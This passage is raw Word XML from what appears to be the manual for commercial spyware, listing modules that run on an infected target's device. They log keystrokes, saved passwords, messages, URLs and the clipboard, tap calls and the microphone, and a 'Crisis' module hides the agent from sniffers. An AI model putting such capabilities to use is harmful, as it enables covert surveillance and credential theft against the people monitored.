                <v:shape id="_x0000_i1097" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId154" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1097" DrawAspect="Content" ObjectID="_1446455312" r:id="rId298"/>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Clipboard</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A250C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Clipboard </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00A250C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule saves the content </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>of the clipboard in text format.</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3621F" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1098" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId299" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1098" DrawAspect="Content" ObjectID="_1446455313" r:id="rId300"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="008B501D" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B501D">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Conference</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00AA2C8D" w:rsidP="007268BF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA2C8D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Conference </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA2C8D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule calls the indicated number opening a conference call whenever the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007268BF">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA2C8D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>makes a call. The receiver's number can listen t</w:t>
            </w:r>
            <w:r w:rsidR="007069D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>o the conversation in real time.</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099" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId158" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1099" DrawAspect="Content" ObjectID="_1446455314" r:id="rId301"/>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Keylog</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00057E0C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Keylog </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00057E0C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all keystrokes on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected Target’s device.</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3621F" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1100" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId302" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1100" DrawAspect="Content" ObjectID="_1446455315" r:id="rId303"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="0093621F" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0093621F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Livemic</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="0093621F" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0093621F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Livemic module lets you listen to a conversation in progress in real time.</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101" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId160" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1101" DrawAspect="Content" ObjectID="_1446455316" r:id="rId304"/>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Messages</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Messages </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all messages received and sent by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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102" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId162" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1102" DrawAspect="Content" ObjectID="_1446455317" r:id="rId305"/>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Mic</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Mic </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records the surroundings audio using the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s </w:t>
            </w:r>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>device</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>microphone</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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103" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId166" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1103" DrawAspect="Content" ObjectID="_1446455318" r:id="rId306"/>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Password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Password </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule logs all passwords saved </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">inside infected Target’s device applications (e.g. </w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">nstant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">essenger and web-mail </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>services).</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104" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId168" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1104" DrawAspect="Content" ObjectID="_1446455319" r:id="rId307"/>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Url</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Url </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Module records the </w:t>
            </w:r>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">websites </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">addresses </w:t>
            </w:r>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">visited by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s.</w:t>
            </w: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RPr="005701FD" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00942A81" w:rsidRPr="006172B5" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="006172B5" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="006172B5" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="006172B5" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00942A81" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1105" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId170" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1105" DrawAspect="Content" ObjectID="_1446455320" r:id="rId308"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Crisis</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Crisis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">automatically or upon a specific </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ction) recognizes dangerous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">situations on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">that may disclose the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>gent’s presence on the device (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. a network </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sniffer)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Synchronization and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">other </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>comma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nds can be temporarily disabled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001F0B7A" w:rsidRDefault="001F0B7A" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F0B7A" w:rsidRDefault="001F0B7A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRPr="00EF348A" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow to specify additional parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The images below show the pop-up windows for the </w:t>
      </w:r>
      <w:r w:rsidR="00DA3CC8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
